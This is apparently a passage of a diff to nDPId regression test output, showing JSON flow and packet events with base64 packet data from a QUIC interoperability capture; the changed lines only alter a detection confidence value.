JUuuaYdMH\/IWPcTw7L1PQOQRTBPiChmKnH9chbLTQGT2spRUw6ZUEwVFq4In3Weuzal0iqS\/0+Qhc+H5LZTfRP3k77cm2bTwA3v9yZps\/N8GHeBgerU\/GibGyvQfEIGnBs4SP6XvADxPaOf9Do6K3NWxPainQ6ROxxs18RzpwAqfNwr4czNzHmge9hVsXC2jkjt+a3iuT2VTvtgYP\/gg3wHLLEejB8ULg0YDhFTSwR5yZE+PblWTw\/h1zub\/pMrOiBxxazdMQ6Cnlz1xT+HwIG9hofXF2+e7REuF5bc+tHJIAxGxRRDEZiMKISCqpeRlWCWzB2x1mmKE\/KOsosvWRujnwCM1KnVuycB6dQCV8X5XgqFkoCYNSzpxTxn5s75i07w6T3iQzjZ7RhS6EVLmvqncx43bMihbC16QzKChHTteVef548eeTYH\/HqbZPAD8YiWnymAmXsIshT9ZrxL58BUWA8AOTB75ExBEpSWvCr6cdH9tmHTnFX+iAHfgQ+SXuDcA8Yh6Ch37H7iJkjIlyFlV0xYK80\/8rLLX9Fi16hMEw4MsMSJoCvgH1JkfA2nunYMhjsU2UTxS5kbVKkx14WrqJvIAkV1s24F3JhhnfrjqaA\/+WQCy6FO4gWrpnAldrYzL2M62GkNRWliggV7ygB87oMNLaAmKZ5PPWr4N7Ua\/KkdB4nYZv97Cgzy\/7FwISfaGW02358adB++VWymI6DWtw2+GpWB3k0kCTmUYA6ScuXne\/RAGeAonjWWbVkNYIk9hKz39J2Uz8YIvzxBUfOGU8GZZmVIYhs+LqHfeGeKbbCDVrdghS8AtfkpMJaXaNuqlKxMd0+QmH708rOIK59+ExcbrFRuuFCV+Y2kBwCFjNISkM\/hxKEL3li6mt6HDE6ObfY03fEoJ8sHxvuyXUyqUrbYA+\/+769MwVZnJvR3BgYsDQ7yyssPJx61jOW9\/\/ZJaUpoeTMs+LvTpOaO3aOGoys7HzhFtjxPpaMeuy6J8rvRGlDmpFIbJDQSikU42BVwHFgIiJEdtXmpWvL6UjR9gEnH7F4leVc6kZRbkH8JQU7saam7b+aLACqy8QGiFKLZZ79Su9BVo3hXx4V\/a9UOG0fwWICYP2rWjoSlMM1D8LD3JyXD\/xHI05oU4AlfqIPRE\/pZQIZghaIHZV\/ga\/hvwGvtrr60MW42GcZ7safTYI3OMKFIcoVKABl6HRXDdV5P2Rt+B44fCqh8Rx5j1GHzSW\/rGFP+xPOA0hzb72SyDr1nPrWA2ufiZWLD7rTJqxk+zP0NWdN1W8Ig7keNnXWv4QL9x\/\/g=="} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":91,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434756,"flow_last_seen":1603816434756,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434756,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"3.121.242.54","src_port":53402,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02155{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1603816434756,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434756,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAOvlAAEARQxzAqAGAA3nyNtCaEVIE7JFKxgoKCgoILW5Ke\/Z2fngAAETSF+9lWl21JTgtfVHZ5XMFAV5iwNh8QJikNlPYLLcL257g14TEszj6j7gT+sZNJ3RW6GlkGKI0cLTiGhA4DZXSY2CRRkQV8aus3zX9x+wV2RPvN+4eYITQBIblhzLx6SrfCRaIuMd\/dIvuprgHzspSsGPsDVaFWE5RHWm8PvIf\/7WDS2AteLmXnCclnhwiNiESFMU\/JfLfx1BGNZvT2HLZlWqxE\/QH\/8leGOFh4OQdOMgDcrWH2aq0ZIEKOcT+22+SBNS+RXSivQkzWAWGACCn3yDlD4LrYX0EufA2pWqvz0bhI1bD1bMjQNQXTpb0IRYB\/IP9pUSfcl09eg\/8nkbY+WxJsi7\/OumDvzxFqxy1vKTBHoCkKcZU6KzCeDnpcN4UpeF\/P9Su7Hbnq6Oiu4kYT7w5TEYJlfr6hPZSINzK1N08yrm8sF5N1X+BgIp1nZKHO3z9qBo5uTSd7eUgib\/5hEBZVUjZfzcENhMxZ3iQWwxtVBdr1MPVUb\/fAHf\/LyB43r9qDPa9CjQlM9LQ10V7PuMS1mZ\/FoYoEt5+Lt+cJHI5bVFxc5jzohk+GAitdRUtpfiTuEwM1BTukQDiBma4oP3e14IOsjoG1G6JReouNpkBgpuToJ+jAbUrib7kmXzQdUA7kbNqdY9YbE3amA8AbTm+9U8XVMYkeWFdsFBWMWYdsARDe\/wNxFennwMBsN1VI\/Sf2kdpBwmikma9+VOfFyk1+k2sHTPIlSkVm3zjzWfLNM1PgYnwDxsauAlC6hmm0JtKmTtkv+Pn\/\/bRNz47TPwG\/lMWs1GWc\/Duiv2CyU27DrRqkZl9eIkxpCPq+lhf64B8FwAcAY126ezwgYeSIj\/2BPVLzj6uWaHdPFiHkcYmsVRVcNxcn7SbmC6vMu39440UH8ewpx4045LjoYhYGYD9wbNo\/kPCLdYB5lMNkMJTlPPmNe98ODz2WRVDN9gK0zjD8fscveFE1Bpk8Tltq8z87BasUF4e83PNj3KD2dMD7X3GtxvbnR3cIGT3a57NON24InRM\/nwZHwL2bk877r1hTuhvugTQiJQZIW+R7Cd76AgAWAnog5NJv6qFjoKKfxT4AV2tDLzRyjkMMrHebIWYVqs1aklZ5d7wxUYLamAar0CN+WpRkYSzgamBAcwe7BSMa1vimlqjo\/6IlbVmFAty4ZoLhk1JPUo0OTDJGfg7G5ACascLpelBjrrhC8q2UQKF8audmNUZRXmNP+namQx8VwfIgH5YHylOs57ZtHfGy6hvAJo\/Tqvp\/umN87FBHWfLNRT8fGjmReoFRPTt1LBgsiQauA98uLlL\/MhK3zSkvFJb8TpBWg0yrTs+EkEfcIYy\/54O1JGnSBS8+4f\/1DKIa1jmhY4F7hcK\/Y\/Zi33FgbmmvzZ+cspy2SIEhxePsUH3DOdZcJPxMiL9n2teu3XWpEwymkPM3I7Kauv6WrFEPbeyTEqbxV\/7RpTQ21VJA+vSCdBrxnvlGaubOeoQaS4+J\/ugEvRReICuHUPNCmQAnXPbJmcvvOj5p4u5B1t7PBGR3R1kOZNNBIvoThwX9CAlMfPhMMsjct7r8pVUeMkYfmNf8DVqscAvJ5\/vInV2if80iUDSzxy3mS373dztl6IVts0qx7XYaK5V4uL6xfDViQ=="} -01010{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434756,"flow_last_seen":1603816434756,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434756,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"3.121.242.54","src_port":53402,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"ietf.akaquic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01010{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434756,"flow_last_seen":1603816434756,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434756,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"3.121.242.54","src_port":53402,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"ietf.akaquic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 02152{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1603816434756,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434756,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAwbRAAEAR5e\/AqAGAwb4KYsH6AbsE7NgwygoKCgoIc5O0PcfI+J8AAETSgTdR0pp7ROFzny7v80GZO+tdgWE1YYvBBVpTfYCLLZ9LR2R\/NMsrhl9CtsbdCKSqQlM9jeDSd7avtFbwkZgUMsGjQSFGIrauocKoeR\/IYUv\/3yqId1gln9QOjFOA7Vx3pZz\/40HjTDz++wnocf0Q7LKFbnIVVlAkyHprEOHxkx31yKlE1OrKPFXX64LJtMBzJGNe1ikJ4DBZc3CxM4VAmWh6jZ6Xziu1T48Y9Jp1rXJLZkDZluz9DNypT19E9aFE2QAE2YffnA08t2CC0Dav\/nelE7OXLvT3\/abxcTvv6lkWQ7Ws\/OGhflJV6pbd8DOAJlm41dw48U7866L\/ZVnZQGhC+qy29Rf0f9z7LTwYqeUnFBlTnrWIJUDejmyBK0xmX71p+M4ZDQYk6ksEN7ys9IhEK+0Ik4NF3m6iw+Y3srEwTIzK7SMuEUaqxHAnsnY0cY7xUBPiPgfPBbiLOeDS23803rHtAW6t+pcVbYzcUhLC5i4Fhsy5HB7swuOTaDalPrb1ks0Osqlmdnwi+VtFXIfWY5hiA\/takn+M6zgv2Z5TIeGz5PwD\/mNhYevqBSzxfqtF6pqWG4u\/KRjbRiKsndJKZWqgEurVo18heo2c6BuDo0f63l9uVIrESW645Q3fwcjj5n0WWKE8\/gOmB1q+Qfeb5YwzG2mkb0uuRf1dVhHaEpflcJ4\/TP64ezBPm2PEqdUJ98ani+HAdCRefhilKHlZCp8FaM0g6fLSIWNKgyXd08cPKg3kQr1QKPyCDeevRCjLROEYKMQBfMcVsYelRUae3sfcDjOm3duGl9ZwBYRTuhqBGmO8BgPbJTCOUP3SnFPjNHZReb65nPAq5CmaErExRB3aqj2X70FK4POxZDcdB2SCLeNQjD0gAdoPMDjy6TU8QbOW6emahG\/pm2XLGB82paRNLQ1UrajFFljlEad6px4jnFkmQswkS1ZCAcPuyjYtBQOoVyU6Jn8IET5bSZAQYtSzhJcRSsotN89chVt8BOmx9WoAiAY6LsHVmGCH8fyiVJ8R96liGv\/mCcZB6Oi41IwhqNraSx\/YHNb8PDeqgVZnzU7HOxgMto9BkhGXVAa\/MDhpy7ONbZFtXLugZH\/GeA4uKx4T\/QjSGOy8\/I8tKHhy1ciKQVx\/4efbfMnze1\/7wiD29p7nKFEe8jhCs0tUTtvbs5svZDkGpMLh\/X4M8hVxSKoXJ4GInFSKgl6TdVamGbNzyLxWmQUTAYnTn24BPh82ABwBHi8IX8bKxOnTE9ArtO1ncpBuGK6utDYd+flGgrwW8Kx3EAqCtI+xt3hxI1lVVBS5mqinEpT4rI7UFt6bivyn3w8QLN2BAypCK2nDcT4jrgs2l16Qbqcq5B1aHCyILvPoswAdCLirW7pESSTDoJJLaY3+F0tLUXrHW1QCvM\/i6MkbViFrAX1Wv2DuS4QGedw\/jPkFjn0PVCpFH1LNlSl\/mq7ojJPIzqm4YoISxxdl92D1MuRAOkcGfHDjHzu2gXU4R2SOjkBJKT78Z0m14Jd3agw7f8zNErlWf3mQN\/cPgefBr3GQB\/5hkj9h7mtqO0XsqbQtHpUzt2Y\/IzySgy2h3inpKHrAmHMy7nBwaqDcL8noSXoChoeTFZAF+yuWHR0EPcyX\/dJQEW5Avw=="} 00648{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":93,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434764,"flow_last_seen":1603816434764,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434764,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","src_port":53140,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02150{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1603816434764,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434764,"pkt":"pJGxgjQ5PKn0qB\/sht1gAVbOBNgRQCABCwcKydWupNP+R2kegH0gAUgAeBcBAb52Tv\/+BGMdz5QRUQTYJfbICgoKCghA0fDpGJ\/Z4QAARL42MmGE7LT7K7Ql+V7EQ3yWatv5MRpdEw0GoTR5NQSX65ds5UbmlVEnPiT6ugJBO3avrGIdm9NfC0YolC+M7h3Dd+R8rmFmbMufRy7tEXwOSANvtASfChD2QtW7IUdoUpURW\/ybH6H3HL74XAiUZ9DaKTFRCIGfbZdMWt8ZGjlM+G0uKJJyI4UiXMqUmldhkusW7Dkb3B5PhdsU4l\/\/nXb1ocHMF5ZO15qTuXpuDw3KLbi7Dk3CU80ZSrgIQRr4QnZY7DqaQqaTgqwsAdQp1wPEsQudwtV3+rldfGptoheCDmbpY8ruZrzgIcViEvjU5I9Ku4MmOSDc008VMVo6UbKXAY8wBkNppH+gKT0zKsJbuYos09RElJKJM+JRSvAd13BS3pf5yKPRjvg+VG7dJIXDCpCzd5HB88akDiSNSvnw\/1jpXEBSCG8CQobh6IKIU7erWpgWufuC2MUeTsj93wERw28DYyL4pZ0SgYLM8R+IuAUGggiToLnDY0lhnQxvWPEyOUmn4NJbPGX\/ycsndCFcb9Jll9Txp36+98fi41gKI+rpvius3\/7rHwBBIC53Dc9XI1Li53E\/tYF3PSb\/g4tqh7YqeuJqy592nH72H7zhGojy0gwXJQ\/hWtpj34Umy89wdwne1tmBbDTsm\/OVEe2Hv8wX1eUxdtqxfSQcfE5EjCaX8x5TsLMsFiA+gnimL9YXpXbCar82EARe4s\/1NGbcVosoctM9nH774rkUWziya9xnPI59V8iborTptEZmzs9opsMwWCSG3SUoMF+XgWmJrobGMEBNgQ6NuDdRKVGnCOz5ViUV8HOdhxWdLar9arspdIIQioDF1eMysE8I5ZwvEkpGFpxtL8pSwMYHtvi38MARaK84JW5F4Q+Z9NKUbjEnyJk4DLBXQDZCAccejGxLIlAEw9mV\/SQqwWMDKPfcgeBYaGkjuKCt9IwYkKfJdCAHGlWbthDy9UAYdzWaLgrHKDwv7KjG08gxv3P2Ay64L+MkxpWRZB3zlpP7475UXQoo5J2b\/TCDguBRfBA\/zwH0ywx+bAC1xX58ocUBgtutOfF0Vqf9ZXqQdWJ\/tYbtk2qPb\/vUKDkYspG2+VZV3S4mHyGQEdK+3+Br++sSHMrwkXpKY231omxX2tF0BL0Bxb\/XFoQnF0zVMDi6yl7EdOkVYJKzpCkpByrrFblgbC6aH5tGZmLBBsnQ9oNmcYgP6L4\/rCjc9wp9OI6Dpp\/kCf0+0QdRr65NauWVYS3fzTceAW7h1rV7piIkaCm\/ktLnQ0CjV4yXbM4EAQ\/1J3s6F5an9AUjsSqU7bHdat7EQLbygAV3b2dabdxj5om9WQRt0joYLuxTvD8zwyOedLxW1wTxiQF1SimJGbjZ\/VbtHbirvwE3YrWoKzszq610qQdSeVcciVMkJn8\/frGZPOF+kV+ihka4sCmdlV4EIQk1LeOGrlYlQ6fpIafv8Fxge7YrHQDBRMDZfuEMvNEoQTdfeyjVZwZQIQqYpN1426QLcvTfeGNyVfnI\/BbfhWbK8vegWPhhtQELUYrkCHe43wuMJDkpCyHET\/GRFZPr3UO+sKZLIuMEzbgtFP8BywWzvtpZIPTbuoW\/fNEsBA9hvwy1MQ=="} -01045{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":93,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434764,"flow_last_seen":1603816434764,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434764,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","src_port":53140,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.ogre.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01045{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":93,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434764,"flow_last_seen":1603816434764,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434764,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","src_port":53140,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.ogre.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":94,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434765,"flow_last_seen":1603816434765,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434765,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","src_port":57926,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02157{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":94,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1603816434765,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434765,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAU3xAAEARXwnAqAGAjOM0XOJGEVIE7OZyxwoKCgoIVNEfWrpr6t8AAETShzjiz2D78m1qpQ+wdRdnpG0LI97NN9w\/zKLTNwbycXDRt9x16mx5gVIiYU9my7Ewd3ZQMG74RKzp5yqjf1swV34ZhT\/6a6RECEeuXIhfq5HIaUvnylxvuq5Ar2tLEHKFSp+lL3+2mCGKG\/aNYIIMA9OUhG2opUeuB2l5mNW6BfknYi6bDFHQDD1kdTaXvzq60RpfCfERji\/a12lQL6ybflc1AUHJdy355ohjy1PIdK24siM83Pzy3WhuqqXhu48NlkiWBwzRIc3QwNG05XWtibPZpt+rnEgQ+dX5n3b+VdVkbT1SCRuZXy4KNB1O35Lr9kd9\/8w+iJRgvFGDJ1gPEsh0qR0CocMn8hmur7qxG29GbjVMp7R1NSj2eAOtmvYpLRwpEXgHuZyaQ1wjCTKff2\/madFWTA4XUYv4fZGglZSmwIF\/drNbz5S3P\/iWcoMFEHkI4sVFj9ZYFd4B3L8Ih2KOMfq0bJT\/WfJrXj4M4zI4ZrVBE7HjqFO+Xl4tQchegf9m36aJmP9rCIyTgms9JLdAWw4p9HwzAtYzEsN7etsiFMbBGYxWytAD85x3V9BiLZ0tRaEDbZVSI3dKqLBjOACNgGbIysz\/M5PX6bbnVEJL+rpXP4dfmzf\/vyIoXSLGK\/35Ot0RpvgHsUdk1M1JiJ\/w0LW\/ca8oRdqHyGl\/0OHcNoRXWU9uCpfJhoCR17fY7d\/8uGaioJukkywUyDy4lEoJon8wuutdoFaZ2G1NQYMqLk2L9BSwK6uXlh\/KFqoktCfkCzS\/xf+XdyqvzCmUAccDyVcTW2Lvm6Iydjjcz17WgP2sboaA9M+jrUXfYeNBGU+gooCH\/ra1qqj6hZV+ycQaUnNe1GLXG68adoCLMAH3j+oxneUkPOBiO5E\/EF5WMPYRqDPOKxnvKYyV0lEoyBg27SjzbmIsvSP3tH7+YEc5r+OkK5iuBgQnkGchz2TXPmjupTCg7Xojg+c2Vl21XIeYUg5zp5dqk+Dg1R9d\/NVFrsh0doLMsqN8QHWUOatOJlm\/\/hWn7+iCSCBW1hRFoljw2OaG0E\/WHGtKJCH2ZhTW\/OlsWDZ1I6a9AalNu2a3QLqufVsas9PvBAL98YjcgSJ2vBIk\/BVRBpG1Q\/rHLLGdBQB\/\/fZj9y5wySLqEy0sx93+y3Y1YIBdxSNqeVQx\/fJpwJre6YpAYG9B9bZ\/BhXdwe1PHHhhhh+Tc0H6ljXzAZf5EDPA4QtQAjr8TpYSQuwb\/souaXFbGTPfik1Mu8mHXJ7chWN7BzwY6WVcDvctTf5wcun\/ot9mUzugsNNaZfRJbJao7Y6eGCUXHAEDWUWwm6eFYQim4\/i3o6CdH9tbSa5KMv36T6nVCkpY+qDyBJdXUmrtiozwIoULbVWC7vKc4k21qmL36sDhhn10y6PN4bIg1\/diWwWYCyWvERVVVw+kY2BYCLC6p8eQ4ktUYbvTDjH7p17NqO7ef3HSSFWp67hCGKfd+ge3gy9+0Ke6znAKoZn3gft7e4Qngv6MCc\/8gqKo6NfPX0NUiWvPO5U1BDl2yWaNt0QFBBfKLxj+uxMZfebHky9N1aDOeVaIQ9eYOanbE2+OeMk1d8+h4d5hGTbyyYZ3xpCnfIP7rR2Q8OBY5Js9LjU+ch2BSmUmNfrrjQ=="} -00999{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":94,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434765,"flow_last_seen":1603816434765,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434765,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","src_port":57926,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.examp1e.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +00999{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":94,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434765,"flow_last_seen":1603816434765,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434765,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","src_port":57926,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.examp1e.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 02154{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1603816434765,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434765,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUALHVAAEARX6PAqAGAKHC\/PLT+AbsE7IqdzwoKCgoIe34skUb\/aLsAAETSJwiqldCG5d2DtH8UDlA+BP\/n+Hka9N9gLDvV00Jk\/OgePJAsiH3HrqXWf6W0XTXk7Pu2p+CFv9C0iF2fTa1ifkWOzj7YZz+hGLr31Ia3KbnzB86fFFCNPLMCgtr6arstfjJ4xI\/CQupOIVcMsg4IO6vzq1hO5uX8ALX13N2Nd4Yxx9Z3IbnXFpgI6JLk1uKVCyweJMlz+LOrhN3PHNyVHIt6alONhgWpEqUlKgTnNS9lCZd9JNENA+veQK+6gvIe2KJWpJlHdMZNI+3fjJnabXQaUxPQIMc0ZI8dZFlz3L059EqhvD2lc8\/naUxdGHznqVZzO\/gUeKnLROfZL6yJDTZiKzf+md1VYLBmBSCdsuQZ7oHBg0w7SSzXTvhRTic8g6kHUcynm9My8rvP3N1cyhHeHYoVTI3hh1p6dM2epSa1QGAI6JHSwnUF1\/QgJ\/yLYnzwcGUMmDxb6+\/Vcoz11hXvHqUfteaUIZrZlPS0IAcPwJ9uUM82Vts2gh0ZtKy1HVF7COtP\/YC8n3yaj2Z4XCxABH1JI1+Gr7s05Sbt7Ydmm0MEi7M4Z7H69xe5sGopICwlQr6BDij0IG\/Q72anBTWx1VNl8l1hae+l8TMmxGeMu9i4blZH4yTZVGbr4Ufrnumx\/iFAYgWQeu6awy9bpeZT5O+xG+rCa2YUWvEwAHwQqGOTLiHRhLqf8bOiysObXTA3QmobJfgdxg\/kMNWj8xUdfAzQUKJYelBbMXT4qn\/A\/bgLMic4ksrxyPSpiS1e9XYY4TcxnGgHk5yxCxuwpm4+S16PEBC8SsJHkLxhM+Pyqg8ZbbK5FBImfMzUEZil15pbURRUjvlZtdskfSyAHSxSF8X4o0JXfUlol+bcOL6ItmB+wzIiN2Q+yijFIXK6d9190X\/aYna6Y1mhBOG0n2BfyedI+P25jlTZHPzLP\/m0eGz0ffpvLil2huLTMVVoPDTaIcLulULXUi1mSE5WxlWTpZdPkeFyxhOecT8BN8ugPHSRdq1YlgSaIwZavu\/XO8PCMiEMZUs7LNob+kHoiN1Yitx+SOUzM3Rfm4SCIMQokalKEYORgNek9yKJq9ysRafffBGVrxSm9fUQ2\/hXog43g3kKJn1+L45W1cDgEOnlzcbSC7mXNgzNI\/9oSvf+verPiM6qHPGSAL45mMH3aGyYMFRQjcVYI49Hhcw\/awYPgb\/M54nczqpco1saP+lU6ffHEwQVDtkjV\/GpfILnkEXC+cQL7juo\/ky491nkMGs1EkNmbbJTwPGVUqPiFcdi\/GoRziaE35KsbCh2pXltXGH77CIkJ8z4h3pP\/kBhLJUXL8fmE9AqMsqW5zCCDLfMDqTPSGLNgu12FdfjnQIvupRRH4Ge0\/B5Zgz1NMHbBts+RgS0Xaxftf2jPR3SxbRu77DVdYw9vVWXM\/R9b26Kxk+mp4fmYKTS6dblfvsoHkgHRfoRp\/1E4eszlorBw59xoTpzT7xgKofVDBGY48JKd52rimDD8\/5N908wmgggGjc\/EEPQbI